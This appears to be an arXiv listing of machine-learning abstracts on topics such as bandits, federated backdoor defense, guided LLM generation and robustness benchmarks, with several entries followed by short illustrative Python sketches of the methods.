    Global Optimization with Parametric Function Approximation. (arXiv:2211.09100v3 [cs.LG] UPDATED)
    We consider the problem of global optimization with noisy zeroth order oracles - a well-motivated problem useful for various applications ranging from hyper-parameter tuning for deep learning to new material design. Existing work relies on Gaussian processes or other non-parametric family, which suffers from the curse of dimensionality. In this paper, we propose a new algorithm GO-UCB that leverages a parametric family of functions (e.g., neural networks) instead. Under a realizable assumption and a few other mild geometric conditions, we show that GO-UCB achieves a cumulative regret of $\tilde{O}(\sqrt{T})$ where $T$ is the time horizon. At the core of GO-UCB is a carefully designed uncertainty set over parameters based on gradients that allows optimistic exploration. Synthetic and real-world experiments illustrate GO-UCB works better than popular Bayesian optimization approaches, even if the model is misspecified.  ( 2 min )
    Deep Exploration for Recommendation Systems. (arXiv:2109.12509v3 [cs.IR] UPDATED)
    Modern recommendation systems ought to benefit by probing for and learning from delayed feedback. Research has tended to focus on learning from a user's response to a single recommendation. Such work, which leverages methods of supervised and bandit learning, forgoes learning from the user's subsequent behavior. Where past work has aimed to learn from subsequent behavior, there has been a lack of effective methods for probing to elicit informative delayed feedback. Effective exploration through probing for delayed feedback becomes particularly challenging when rewards are sparse. To address this, we develop deep exploration methods for recommendation systems. In particular, we formulate recommendation as a sequential decision problem and demonstrate benefits of deep exploration over single-step exploration. Our experiments are carried out with high-fidelity industrial-grade simulators and establish large improvements over existing algorithms.  ( 2 min )
    Invariant Aggregator for Defending against Federated Backdoor Attacks. (arXiv:2210.01834v2 [cs.LG] UPDATED)
    Federated learning is gaining popularity as it enables training high-utility models across several clients without directly sharing their private data. As a downside, the federated setting makes the model vulnerable to various adversarial attacks in the presence of malicious clients. Despite the theoretical and empirical success in defending against attacks that aim to degrade models' utility, defense against backdoor attacks that increase model accuracy on backdoor samples exclusively without hurting the utility on other samples remains challenging. To this end, we first analyze the vulnerability of federated learning to backdoor attacks over a flat loss landscape, which is common for well-designed neural networks such as Resnet [He et al., 2015] but is often overlooked by previous works. Over a flat loss landscape, misleading federated learning models to exclusively benefit malicious clients with backdoor samples does not require a significant difference between malicious and benign client-wise updates, making existing defenses insufficient. In contrast, we propose an invariant aggregator that redirects the aggregated update to invariant directions that are generally useful via selectively masking out the gradient elements that favor a few and possibly malicious clients, regardless of the difference magnitude. Theoretical results suggest that our approach provably mitigates backdoor attacks over both flat and sharp loss landscapes. Empirical results on three datasets with different modalities and varying numbers of clients further demonstrate that our approach mitigates a broad class of backdoor attacks with a negligible cost on the model utility.  ( 3 min )
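    One plausible reading of the masking idea, sketched here with hypothetical names and a simple sign-agreement rule (the paper's actual criterion may differ): zero out update coordinates on which too few clients agree, irrespective of how large any individual client's update is.

```python
import numpy as np

def invariant_aggregate(client_updates, agreement=0.7):
    """Sketch of sign-agreement masking for federated aggregation.

    client_updates: (num_clients, d) array of per-client model updates.
    Coordinates whose sign is shared by fewer than `agreement` of the
    clients are zeroed out, so a few (possibly malicious) clients cannot
    steer those coordinates no matter how large their updates are.
    """
    updates = np.asarray(client_updates, dtype=float)
    signs = np.sign(updates)
    # Fraction of clients agreeing with the majority sign, per coordinate.
    frac_pos = (signs > 0).mean(axis=0)
    frac_neg = (signs < 0).mean(axis=0)
    majority = np.maximum(frac_pos, frac_neg)
    mask = majority >= agreement
    return updates.mean(axis=0) * mask
```

    Note the mask depends only on sign agreement, not magnitude, which is what lets it act even when malicious and benign updates look similar in norm.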
    Model Selection for Generic Contextual Bandits. (arXiv:2107.03455v2 [stat.ML] UPDATED)
    We consider the problem of model selection for the general stochastic contextual bandits under the realizability assumption. We propose a successive refinement based algorithm called Adaptive Contextual Bandit ({\ttfamily ACB}), that works in phases and successively eliminates model classes that are too simple to fit the given instance. We prove that this algorithm is adaptive, i.e., the regret rate order-wise matches that of any provable contextual bandit algorithm (e.g., \cite{falcon}) that needs the knowledge of the true model class. The price of not knowing the correct model class turns out to be only an additive term contributing to the second order term in the regret bound. This cost possesses the intuitive property that it becomes smaller as the model class becomes easier to identify, and vice-versa. We also show that a much simpler explore-then-commit (ETC) style algorithm also obtains a similar regret bound, despite not knowing the true model class. However, the cost of model selection is higher in ETC as opposed to in {\ttfamily ACB}, as expected. Furthermore, for the special case of linear contextual bandits, we propose specialized algorithms that obtain sharper guarantees compared to the generic setup.  ( 2 min )
    Efficient Guided Generation for Large Language Models. (arXiv:2307.09702v2 [cs.CL] UPDATED)
    In this article we describe an efficient approach to guiding language model text generation with regular expressions and context-free grammars. Our approach adds little to no overhead to the token sequence generation process, and makes guided generation feasible in practice. An implementation is provided in the open source Python library Outlines.  ( 2 min )
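    The core idea can be illustrated with a toy (this is our sketch, not the Outlines implementation): at each decoding step, only tokens that keep the partial output a viable prefix of the target pattern are allowed. Since Python's standard `re` module has no partial-match support, the toy hand-writes the viable-prefix regex for one simple pattern; Outlines instead compiles the pattern into an automaton so this check costs almost nothing per token.

```python
import re

# Toy vocabulary and a target pattern: one or more digits followed by "px".
VOCAB = ["0", "1", "7", "p", "x", "cat"]
FULL = re.compile(r"[0-9]+px")
# For this simple pattern, the viable prefixes can themselves be written
# as a regex; a real implementation derives this from the pattern's DFA.
PREFIX = re.compile(r"[0-9]*|[0-9]+p|[0-9]+px")

def allowed_tokens(prefix):
    """Tokens whose addition keeps the output a viable prefix of FULL."""
    return [t for t in VOCAB if PREFIX.fullmatch(prefix + t)]

def guided_generate(pick, max_steps=8):
    """Greedy guided decoding: `pick` chooses among allowed tokens only."""
    out = ""
    for _ in range(max_steps):
        options = allowed_tokens(out)
        if not options:
            break
        out += pick(options)
        if FULL.fullmatch(out):
            break
    return out
```

    Whatever scoring function plays the role of `pick`, the output is guaranteed to stay inside the language of the pattern.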
    Warming up recurrent neural networks to maximise reachable multistability greatly improves learning. (arXiv:2106.01001v3 [cs.LG] UPDATED)
    Training recurrent neural networks is known to be difficult when time dependencies become long. In this work, we show that most standard cells only have one stable equilibrium at initialisation, and that learning on tasks with long time dependencies generally occurs once the number of network stable equilibria increases; a property known as multistability. Multistability is often not easily attained by initially monostable networks, making learning of long time dependencies between inputs and outputs difficult. This insight leads to the design of a novel way to initialise any recurrent cell connectivity through a procedure called "warmup" to improve its capability to learn arbitrarily long time dependencies. This initialisation procedure is designed to maximise network reachable multistability, i.e., the number of equilibria within the network that can be reached through relevant input trajectories, in few gradient steps. We show on several information restitution, sequence classification, and reinforcement learning benchmarks that warming up greatly improves learning speed and performance, for multiple recurrent cells, but sometimes impedes precision. We therefore introduce a double-layer architecture initialised with a partial warmup that is shown to greatly improve learning of long time dependencies while maintaining high levels of precision. This approach provides a general framework for improving learning abilities of any recurrent cell when long time dependencies are present. We also show empirically that other initialisation and pretraining procedures from the literature implicitly foster reachable multistability of recurrent cells.  ( 3 min )
    Opinion Market Model: Stemming Far-Right Opinion Spread using Positive Interventions. (arXiv:2208.06620v2 [cs.SI] UPDATED)
    Online extremism has severe societal consequences, including normalizing hate speech, user radicalization, and increased social divisions. Various mitigation strategies have been explored to address these consequences. One such strategy uses positive interventions: controlled signals that add attention to the opinion ecosystem to boost certain opinions. To evaluate the effectiveness of positive interventions, we introduce the Opinion Market Model (OMM), a two-tier online opinion ecosystem model that considers both inter-opinion interactions and the role of positive interventions. The size of the opinion attention market is modeled in the first tier using the multivariate discrete-time Hawkes process; in the second tier, opinions cooperate and compete for market share, given limited attention, using the market share attraction model. We demonstrate the convergence of our proposed estimation scheme on a synthetic dataset. Next, we test OMM on two learning tasks, applying it to two real-world datasets to predict attention market shares and uncover latent relationships between online items. The first dataset comprises Facebook and Twitter discussions containing moderate and far-right opinions about bushfires and climate change. The second dataset captures popular VEVO artists' YouTube and Twitter attention volumes. OMM outperforms the state-of-the-art predictive models on both datasets and captures latent cooperation-competition relations. We uncover (1) self- and cross-reinforcement between far-right and moderate opinions on the bushfires and (2) pairwise artist relations that correlate with real-world interactions such as collaborations and long-lasting feuds. Lastly, we use OMM as a testbed for positive interventions and show how media coverage modulates the spread of far-right opinions.  ( 3 min )
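    The first tier can be illustrated with a univariate discrete-time Hawkes process, where today's expected attention volume is a baseline plus exponentially decaying excitation from past volumes. This is a generic textbook construction with our own parameter names, not OMM's multivariate model:

```python
import numpy as np

def simulate_discrete_hawkes(mu, alpha, beta, steps, rng=None):
    """Simulate counts N_t ~ Poisson(lambda_t) with
    lambda_t = mu + alpha * sum_{s < t} exp(-beta * (t - s)) * N_s.
    The process stays non-explosive roughly when the branching ratio
    alpha / (exp(beta) - 1) is below 1.
    """
    rng = np.random.default_rng(rng)
    counts = np.zeros(steps, dtype=int)
    intensity = np.zeros(steps)
    excitation = 0.0  # running kernel-weighted sum of past counts
    for t in range(steps):
        intensity[t] = mu + alpha * excitation
        counts[t] = rng.poisson(intensity[t])
        # one decay step absorbs today's count into the running sum
        excitation = np.exp(-beta) * (excitation + counts[t])
    return counts, intensity
```

    Setting alpha to zero recovers a plain Poisson process; positive alpha makes bursts of attention self-exciting, which is the behavior the attention-market tier needs to capture.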
    Data-Driven Modeling of Noise Time Series with Convolutional Generative Adversarial Networks. (arXiv:2207.01110v3 [eess.SP] UPDATED)
    Random noise arising from physical processes is an inherent characteristic of measurements and a limiting factor for most signal processing and data analysis tasks. Given the recent interest in generative adversarial networks (GANs) for data-driven modeling, it is important to determine to what extent GANs can faithfully reproduce noise in target data sets. In this paper, we present an empirical investigation that aims to shed light on this issue for time series. Namely, we assess two general-purpose GANs for time series that are based on the popular deep convolutional GAN (DCGAN) architecture, a direct time-series model and an image-based model that uses a short-time Fourier transform (STFT) data representation. The GAN models are trained and quantitatively evaluated using distributions of simulated noise time series with known ground-truth parameters. Target time series distributions include a broad range of noise types commonly encountered in physical measurements, electronics, and communication systems: band-limited thermal noise, power law noise, shot noise, and impulsive noise. We find that GANs are capable of learning many noise types, although they predictably struggle when the GAN architecture is not well suited to some aspects of the noise, e.g., impulsive time-series with extreme outliers. Our findings provide insights into the capabilities and potential limitations of current approaches to time-series GANs and highlight areas for further research. In addition, our battery of tests provides a useful benchmark to aid the development of deep generative models for time series.  ( 3 min )
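    One of the target noise families, power law (1/f^beta) noise, has a standard generator worth keeping in mind when building such benchmarks: spectrally shape white Gaussian noise and transform back. This sketch is a common construction, not the paper's simulation code:

```python
import numpy as np

def power_law_noise(n, beta, rng=None):
    """Generate length-n noise with power spectral density ~ 1/f^beta.

    beta = 0 gives white noise, beta = 1 pink, beta = 2 brown(ish):
    white Gaussian noise is shaped in the frequency domain by f^(-beta/2)
    and transformed back, then normalized to zero mean and unit variance.
    """
    rng = np.random.default_rng(rng)
    white = rng.normal(size=n)
    spectrum = np.fft.rfft(white)
    freqs = np.fft.rfftfreq(n)
    freqs[0] = freqs[1]  # avoid dividing by zero at DC
    spectrum *= freqs ** (-beta / 2.0)
    x = np.fft.irfft(spectrum, n)
    return (x - x.mean()) / x.std()
```

    Ground-truth parameters such as beta are known by construction, which is exactly what makes distributions like these usable for quantitative GAN evaluation.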
    Provably Efficient UCB-type Algorithms For Learning Predictive State Representations. (arXiv:2307.00405v2 [cs.LG] UPDATED)
    The general sequential decision-making problem, which includes Markov decision processes (MDPs) and partially observable MDPs (POMDPs) as special cases, aims at maximizing a cumulative reward by making a sequence of decisions based on a history of observations and actions over time. Recent studies have shown that the sequential decision-making problem is statistically learnable if it admits a low-rank structure modeled by predictive state representations (PSRs). Despite these advancements, existing approaches typically involve oracles or steps that are not computationally efficient. On the other hand, the upper confidence bound (UCB) based approaches, which have served successfully as computationally efficient methods in bandits and MDPs, have not been investigated for more general PSRs, due to the difficulty of optimistic bonus design in these more challenging settings. This paper proposes the first known UCB-type approach for PSRs, featuring a novel bonus term that upper bounds the total variation distance between the estimated and true models. We further characterize the sample complexity bounds for our designed UCB-type algorithms for both online and offline PSRs. In contrast to existing approaches for PSRs, our UCB-type algorithms enjoy computational efficiency, last-iterate guaranteed near-optimal policy, and guaranteed model accuracy.  ( 2 min )
    MultiRobustBench: Benchmarking Robustness Against Multiple Attacks. (arXiv:2302.10980v3 [cs.LG] UPDATED)
    The bulk of existing research in defending against adversarial examples focuses on defending against a single (typically bounded Lp-norm) attack, but for a practical setting, machine learning (ML) models should be robust to a wide variety of attacks. In this paper, we present the first unified framework for considering multiple attacks against ML models. Our framework is able to model different levels of learner's knowledge about the test-time adversary, allowing us to model robustness against unforeseen attacks and robustness against unions of attacks. Using our framework, we present the first leaderboard, MultiRobustBench, for benchmarking multiattack evaluation which captures performance across attack types and attack strengths. We evaluate the performance of 16 defended models for robustness against a set of 9 different attack types, including Lp-based threat models, spatial transformations, and color changes, at 20 different attack strengths (180 attacks total). Additionally, we analyze the state of current defenses against multiple attacks. Our analysis shows that while existing defenses have made progress in terms of average robustness across the set of attacks used, robustness against the worst-case attack is still a big open problem as all existing models perform worse than random guessing.  ( 2 min )
    My Boli: Code-mixed Marathi-English Corpora, Pretrained Language Models and Evaluation Benchmarks. (arXiv:2306.14030v2 [cs.CL] UPDATED)
    The research on code-mixed data is limited due to the unavailability of dedicated code-mixed datasets and pre-trained language models. In this work, we focus on the low-resource Indian language Marathi which lacks any prior work in code-mixing. We present L3Cube-MeCorpus, a large code-mixed Marathi-English (Mr-En) corpus with 10 million social media sentences for pretraining. We also release L3Cube-MeBERT and MeRoBERTa, code-mixed BERT-based transformer models pre-trained on MeCorpus. Furthermore, for benchmarking, we present three supervised datasets MeHate, MeSent, and MeLID for downstream tasks like code-mixed Mr-En hate speech detection, sentiment analysis, and language identification respectively. These evaluation datasets individually consist of ~12,000 manually annotated Marathi-English code-mixed tweets. Ablations show that the models trained on this novel corpus significantly outperform the existing state-of-the-art BERT models. This is the first work that presents artifacts for code-mixed Marathi research. All datasets and models are publicly released at https://github.com/l3cube-pune/MarathiNLP .  ( 2 min )
    Post-variational quantum neural networks. (arXiv:2307.10560v1 [quant-ph])
    Quantum computing has the potential to provide substantial computational advantages over current state-of-the-art classical supercomputers. However, current hardware is not advanced enough to execute fault-tolerant quantum algorithms. An alternative, hybrid quantum-classical computing with variational algorithms, can exhibit barren plateau issues, causing slow convergence of gradient-based optimization techniques. In this paper, we discuss "post-variational strategies", which shift tunable parameters from the quantum computer to the classical computer, opting for ensemble strategies when optimizing quantum models. We discuss various strategies and design principles for constructing individual quantum circuits, where the resulting ensembles can be optimized with convex programming. Further, we discuss architectural designs of post-variational quantum neural networks and analyze the propagation of estimation errors throughout such neural networks. Lastly, we show that our algorithm can be applied to real-world applications such as image classification on handwritten digits, producing a 96% classification accuracy.
    Causality-oriented robustness: exploiting general additive interventions. (arXiv:2307.10299v1 [stat.ME])
    Since distribution shifts are common in real-world applications, there is a pressing need for developing prediction models that are robust against such shifts. Existing frameworks, such as empirical risk minimization or distributionally robust optimization, either lack generalizability for unseen distributions or rely on postulated distance measures. Alternatively, causality offers a data-driven and structural perspective to robust predictions. However, the assumptions necessary for causal inference can be overly stringent, and the robustness offered by such causal models often lacks flexibility. In this paper, we focus on causality-oriented robustness and propose Distributional Robustness via Invariant Gradients (DRIG), a method that exploits general additive interventions in training data for robust predictions against unseen interventions, and naturally interpolates between in-distribution prediction and causality. In a linear setting, we prove that DRIG yields predictions that are robust among a data-dependent class of distribution shifts. Furthermore, we show that our framework includes anchor regression (Rothenh\"ausler et al.\ 2021) as a special case, and that it yields prediction models that protect against more diverse perturbations. We extend our approach to the semi-supervised domain adaptation setting to further improve prediction performance. Finally, we empirically validate our methods on synthetic simulations and on single-cell data.  ( 2 min )
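    The anchor regression special case admits a compact closed form: ordinary least squares after transforming the data with W = I + (sqrt(gamma) - 1) P_A, where P_A projects onto the column space of the anchor matrix. The sketch below illustrates that special case only (function names ours), not the DRIG estimator:

```python
import numpy as np

def anchor_regression(X, y, A, gamma):
    """Anchor regression: OLS on data transformed by
    W = I + (sqrt(gamma) - 1) * P_A, with P_A the projection onto
    the column space of the anchor matrix A. gamma = 1 recovers OLS;
    larger gamma protects against stronger anchor-aligned shifts.
    """
    P = A @ np.linalg.pinv(A)  # projection onto col(A)
    W = np.eye(len(y)) + (np.sqrt(gamma) - 1.0) * P
    Xt, yt = W @ X, W @ y
    coef, *_ = np.linalg.lstsq(Xt, yt, rcond=None)
    return coef
```

    The single knob gamma interpolates between in-distribution prediction (gamma = 1) and increasingly shift-robust estimates, mirroring the interpolation the abstract describes.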
    Time for aCTIon: Automated Analysis of Cyber Threat Intelligence in the Wild. (arXiv:2307.10214v1 [cs.CR])
    Cyber Threat Intelligence (CTI) plays a crucial role in assessing risks and enhancing security for organizations. However, the process of extracting relevant information from unstructured text sources can be expensive and time-consuming. Our empirical experience shows that existing tools for automated structured CTI extraction have performance limitations. Furthermore, the community lacks a common benchmark to quantitatively assess their performance. We fill these gaps providing a new large open benchmark dataset and aCTIon, a structured CTI information extraction tool. The dataset includes 204 real-world publicly available reports and their corresponding structured CTI information in STIX format. Our team curated the dataset involving three independent groups of CTI analysts working over the course of several months. To the best of our knowledge, this dataset is two orders of magnitude larger than previously released open source datasets. We then design aCTIon, leveraging recently introduced large language models (GPT3.5) in the context of two custom information extraction pipelines. We compare our method with 10 solutions presented in previous work, for which we develop our own implementations when open-source implementations were lacking. Our results show that aCTIon outperforms previous work for structured CTI extraction with an improvement in F1-score of 10 to 50 percentage points across all tasks.  ( 2 min )
    A Step Towards Worldwide Biodiversity Assessment: The BIOSCAN-1M Insect Dataset. (arXiv:2307.10455v1 [cs.CV])
    In an effort to catalog insect biodiversity, we propose a new large dataset of hand-labelled insect images, the BIOSCAN-Insect Dataset. Each record is taxonomically classified by an expert, and also has associated genetic information including raw nucleotide barcode sequences and assigned barcode index numbers, which are genetically-based proxies for species classification. This paper presents a curated million-image dataset, primarily to train computer-vision models capable of providing image-based taxonomic assessment; however, the dataset also presents compelling characteristics, the study of which would be of interest to the broader machine learning community. Driven by the biological nature inherent to the dataset, a characteristic long-tailed class-imbalance distribution is exhibited. Furthermore, taxonomic labelling is a hierarchical classification scheme, presenting a highly fine-grained classification problem at lower levels. Beyond spurring interest in biodiversity research within the machine learning community, progress on creating an image-based taxonomic classifier will also further the ultimate goal of all BIOSCAN research: to lay the foundation for a comprehensive survey of global biodiversity. This paper introduces the dataset and explores the classification task through the implementation and analysis of a baseline classifier.  ( 2 min )
    Learning Formal Specifications from Membership and Preference Queries. (arXiv:2307.10434v1 [cs.FL])
    Active learning is a well-studied approach to learning formal specifications, such as automata. In this work, we extend active specification learning by proposing a novel framework that strategically requests a combination of membership labels and pair-wise preferences, a popular alternative to membership labels. The combination of pair-wise preferences and membership labels allows for a more flexible approach to active specification learning, which previously relied on membership labels only. We instantiate our framework in two different domains, demonstrating the generality of our approach. Our results suggest that learning from both modalities allows us to robustly and conveniently identify specifications via membership and preferences.  ( 2 min )
    Quantitative CLTs in Deep Neural Networks. (arXiv:2307.06092v2 [cs.LG] UPDATED)
    We study the distribution of a fully connected neural network with random Gaussian weights and biases in which the hidden layer widths are proportional to a large constant $n$. Under mild assumptions on the non-linearity, we obtain quantitative bounds on normal approximations valid at large but finite $n$ and any fixed network depth. Our theorems show both for the finite-dimensional distributions and the entire process, that the distance between a random fully connected network (and its derivatives) to the corresponding infinite width Gaussian process scales like $n^{-\gamma}$ for $\gamma>0$, with the exponent depending on the metric used to measure discrepancy. Our bounds are strictly stronger in terms of their dependence on network width than any previously available in the literature; in the one-dimensional case, we also prove that they are optimal, i.e., we establish matching lower bounds.
    Impatient Bandits: Optimizing Recommendations for the Long-Term Without Delay. (arXiv:2307.09943v2 [cs.LG] UPDATED)
    Recommender systems are a ubiquitous feature of online platforms. Increasingly, they are explicitly tasked with increasing users' long-term satisfaction. In this context, we study a content exploration task, which we formalize as a multi-armed bandit problem with delayed rewards. We observe that there is an apparent trade-off in choosing the learning signal: Waiting for the full reward to become available might take several weeks, hurting the rate at which learning happens, whereas measuring short-term proxy rewards reflects the actual long-term goal only imperfectly. We address this challenge in two steps. First, we develop a predictive model of delayed rewards that incorporates all information obtained to date. Full observations as well as partial (short or medium-term) outcomes are combined through a Bayesian filter to obtain a probabilistic belief. Second, we devise a bandit algorithm that takes advantage of this new predictive model. The algorithm quickly learns to identify content aligned with long-term success by carefully balancing exploration and exploitation. We apply our approach to a podcast recommendation problem, where we seek to identify shows that users engage with repeatedly over two months. We empirically validate that our approach results in substantially better performance compared to approaches that either optimize for short-term proxies, or wait for the long-term outcome to be fully realized.
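    The two-step recipe can be caricatured with a conjugate normal-normal filter and Thompson sampling (our toy, not the paper's model): partial proxy observations update a per-arm belief about the long-term reward, and arms are chosen by sampling from those beliefs.

```python
import numpy as np

def posterior(prior_mean, prior_var, obs, obs_var):
    """Normal-normal update: fold any partial (short/medium-term proxy)
    observations seen so far into the belief about an arm's long-term
    reward. With no observations, the prior is returned unchanged."""
    precision = 1.0 / prior_var + len(obs) / obs_var
    mean = (prior_mean / prior_var + sum(obs) / obs_var) / precision
    return mean, 1.0 / precision

def thompson_pick(beliefs, rng=None):
    """beliefs: list of (mean, var) per arm; sample each belief and
    play the arm with the highest draw (exploration via uncertainty)."""
    rng = np.random.default_rng(rng)
    samples = [rng.normal(m, np.sqrt(v)) for m, v in beliefs]
    return int(np.argmax(samples))
```

    Because the belief tightens as proxy observations arrive, the bandit does not have to wait the full two months before shifting traffic toward promising shows.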
    Chordal Averaging on Flag Manifolds and Its Applications. (arXiv:2303.13501v2 [cs.CV] UPDATED)
    This paper presents a new, provably-convergent algorithm for computing the flag-mean and flag-median of a set of points on a flag manifold under the chordal metric. The flag manifold is a mathematical space consisting of flags, which are sequences of nested subspaces of a vector space that increase in dimension. The flag manifold is a superset of a wide range of known matrix spaces, including Stiefel manifolds and Grassmannians, making it a general object that is useful in a wide variety of computer vision problems. To tackle the challenge of computing first order flag statistics, we first transform the problem into one that involves auxiliary variables constrained to the Stiefel manifold. The Stiefel manifold is a space of orthogonal frames, and leveraging the numerical stability and efficiency of Stiefel-manifold optimization enables us to compute the flag-mean effectively. Through a series of experiments, we show the competence of our method in Grassmann and rotation averaging, as well as principal component analysis. We release our source code under https://github.com/nmank/FlagAveraging.
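    For the Grassmannian special case, the chordal flag-mean of equal-dimension subspaces has a well-known SVD characterization: it is spanned by the leading left singular vectors of the concatenated orthonormal bases. The sketch below shows only this special case, not the paper's Stiefel-manifold optimization for general flags:

```python
import numpy as np

def grassmann_chordal_mean(bases, k):
    """Chordal mean of k-dimensional subspaces of R^n.

    bases: list of (n, k) matrices with orthonormal columns. The mean
    subspace is spanned by the top-k left singular vectors of the
    horizontal concatenation [U_1 | U_2 | ... | U_m].
    """
    stacked = np.hstack(bases)
    U, _, _ = np.linalg.svd(stacked, full_matrices=False)
    return U[:, :k]
```

    Flags generalize this by nesting subspaces of increasing dimension, which is why the full problem needs the auxiliary Stiefel-manifold formulation rather than a single SVD.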
    Nonlinear Meta-Learning Can Guarantee Faster Rates. (arXiv:2307.10870v1 [stat.ML])
    Many recent theoretical works on \emph{meta-learning} aim to achieve guarantees in leveraging similar representational structures from related tasks towards simplifying a target task. Importantly, the main aim in theory works on the subject is to understand the extent to which convergence rates -- in learning a common representation -- \emph{may scale with the number $N$ of tasks} (as well as the number of samples per task). First steps in this setting demonstrate this property when both the shared representation amongst tasks, and task-specific regression functions, are linear. This linear setting readily reveals the benefits of aggregating tasks, e.g., via averaging arguments. In practice, however, the representation is often highly nonlinear, introducing nontrivial biases in each task that cannot easily be averaged out as in the linear case. In the present work, we derive theoretical guarantees for meta-learning with nonlinear representations. In particular, assuming the shared nonlinearity maps to an infinite-dimensional RKHS, we show that additional biases can be mitigated with careful regularization that leverages the smoothness of task-specific regression functions,
    Leveraging Offline Data in Online Reinforcement Learning. (arXiv:2211.04974v2 [cs.LG] UPDATED)
    Two central paradigms have emerged in the reinforcement learning (RL) community: online RL and offline RL. In the online RL setting, the agent has no prior knowledge of the environment, and must interact with it in order to find an $\epsilon$-optimal policy. In the offline RL setting, the learner instead has access to a fixed dataset to learn from, but is unable to otherwise interact with the environment, and must obtain the best policy it can from this offline data. Practical scenarios often motivate an intermediate setting: if we have some set of offline data and, in addition, may also interact with the environment, how can we best use the offline data to minimize the number of online interactions necessary to learn an $\epsilon$-optimal policy? In this work, we consider this setting, which we call the \textsf{FineTuneRL} setting, for MDPs with linear structure. We characterize the necessary number of online samples needed in this setting given access to some offline dataset, and develop an algorithm, \textsc{FTPedel}, which is provably optimal, up to $H$ factors. We show through an explicit example that combining offline data with online interactions can lead to a provable improvement over either purely offline or purely online RL. Finally, our results illustrate the distinction between \emph{verifiable} learning, the typical setting considered in online RL, and \emph{unverifiable} learning, the setting often considered in offline RL, and show that there is a formal separation between these regimes.
    Invariant Causal Set Covering Machines. (arXiv:2306.04777v2 [cs.LG] UPDATED)
    Rule-based models, such as decision trees, appeal to practitioners due to their interpretable nature. However, the learning algorithms that produce such models are often vulnerable to spurious associations and thus, they are not guaranteed to extract causally-relevant insights. In this work, we build on ideas from the invariant causal prediction literature to propose Invariant Causal Set Covering Machines, an extension of the classical Set Covering Machine algorithm for conjunctions/disjunctions of binary-valued rules that provably avoids spurious associations. We demonstrate both theoretically and empirically that our method can identify the causal parents of a variable of interest in polynomial time.
    Dense Sample Deep Learning. (arXiv:2307.10991v1 [cs.AI])
    Deep Learning (DL), a variant of the neural network algorithms originally proposed in the 1980s, has made surprising progress in Artificial Intelligence (AI), ranging from language translation, protein folding, and autonomous cars to, more recently, human-like language models (chatbots), all tasks that seemed intractable until very recently. Despite the growing use of DL networks, little is actually understood about the learning mechanisms and representations that make these networks effective across such a diverse range of applications. Part of the answer must be the huge scale of the architecture and of the data, since not much has changed since 1987. But the nature of deep learned representations remains largely unknown. Unfortunately, training sets with millions or billions of tokens have unknown combinatorics, and networks with millions or billions of hidden units cannot easily be visualized, so their mechanisms cannot be easily revealed. In this paper, we explore these questions with a large (1.24M weights; VGG) DL network in a novel high-density sample task (5 unique tokens with at minimum 500 exemplars per token), which allows us to more carefully follow the emergence of category structure and feature construction. We use various visualization methods to follow the emergence of the classification and the development of the coupling of feature detectors and structures that provide a type of graphical bootstrapping. From these results we harvest some basic observations of the learning dynamics of DL and propose a new theory of complex feature construction based on our results.
    Private Federated Learning with Autotuned Compression. (arXiv:2307.10999v1 [cs.LG])
    We propose new techniques for reducing communication in private federated learning without the need for setting or tuning compression rates. Our on-the-fly methods automatically adjust the compression rate based on the error induced during training, while maintaining provable privacy guarantees through the use of secure aggregation and differential privacy. Our techniques are provably instance-optimal for mean estimation, meaning that they can adapt to the "hardness of the problem" with minimal interactivity. We demonstrate the effectiveness of our approach on real-world datasets by achieving favorable compression rates without the need for tuning.
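    The on-the-fly flavor can be caricatured with a top-k sparsifier whose k is adjusted from the observed compression error (all names and the update rule below are our own toy choices; the paper's mechanism additionally handles differential privacy and secure aggregation):

```python
import numpy as np

def top_k_compress(update, k):
    """Keep only the k largest-magnitude coordinates of an update."""
    out = np.zeros_like(update)
    idx = np.argsort(np.abs(update))[-k:]
    out[idx] = update[idx]
    return out

def autotune_k(update, k, target_rel_error=0.3):
    """Adjust k from the observed compression error: loosen compression
    when the relative error exceeds the target, tighten it otherwise."""
    d = len(update)
    compressed = top_k_compress(update, k)
    denom = np.linalg.norm(update) or 1.0
    rel_error = np.linalg.norm(update - compressed) / denom
    if rel_error > target_rel_error:
        k = min(d, k + max(1, k // 2))  # too lossy: keep more coordinates
    else:
        k = max(1, k - max(1, k // 4))  # cheap enough: compress harder
    return compressed, k, rel_error
```

    The appeal of such feedback rules is that no compression rate needs to be chosen up front; the rate tracks how compressible the updates actually are.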
    Model Selection for Generic Contextual Bandits. (arXiv:2107.03455v2 [stat.ML] UPDATED)
    We consider the problem of model selection for general stochastic contextual bandits under the realizability assumption. We propose a successive-refinement-based algorithm called Adaptive Contextual Bandit ({\ttfamily ACB}), which works in phases and successively eliminates model classes that are too simple to fit the given instance. We prove that this algorithm is adaptive, i.e., its regret rate order-wise matches that of any provable contextual bandit algorithm (e.g., \cite{falcon}) that needs knowledge of the true model class. The price of not knowing the correct model class turns out to be only an additive term contributing to the second-order term in the regret bound. This cost possesses the intuitive property that it becomes smaller as the model class becomes easier to identify, and vice versa. We also show that a much simpler explore-then-commit (ETC) style algorithm obtains a similar regret bound, despite not knowing the true model class. However, the cost of model selection is higher in ETC than in {\ttfamily ACB}, as expected. Furthermore, for the special case of linear contextual bandits, we propose specialized algorithms that obtain sharper guarantees compared to the generic setup.
    Instance-Dependent Near-Optimal Policy Identification in Linear MDPs via Online Experiment Design. (arXiv:2207.02575v2 [cs.LG] UPDATED)
    While much progress has been made in understanding the minimax sample complexity of reinforcement learning (RL) -- the complexity of learning on the "worst-case" instance -- such measures of complexity often do not capture the true difficulty of learning. In practice, on an "easy" instance, we might hope to achieve a complexity far better than that achievable on the worst-case instance. In this work we seek to understand the "instance-dependent" complexity of learning near-optimal policies (PAC RL) in the setting of RL with linear function approximation. We propose an algorithm, \textsc{Pedel}, which achieves a fine-grained instance-dependent measure of complexity, the first of its kind in the RL with function approximation setting, thereby capturing the difficulty of learning on each particular problem instance. Through an explicit example, we show that \textsc{Pedel} yields provable gains over low-regret, minimax-optimal algorithms and that such algorithms are unable to hit the instance-optimal rate. Our approach relies on a novel online experiment design-based procedure which focuses the exploration budget on the "directions" most relevant to learning a near-optimal policy, and may be of independent interest.
    Gaussian Process Priors for Systems of Linear Partial Differential Equations with Constant Coefficients. (arXiv:2212.14319v3 [stat.ML] UPDATED)
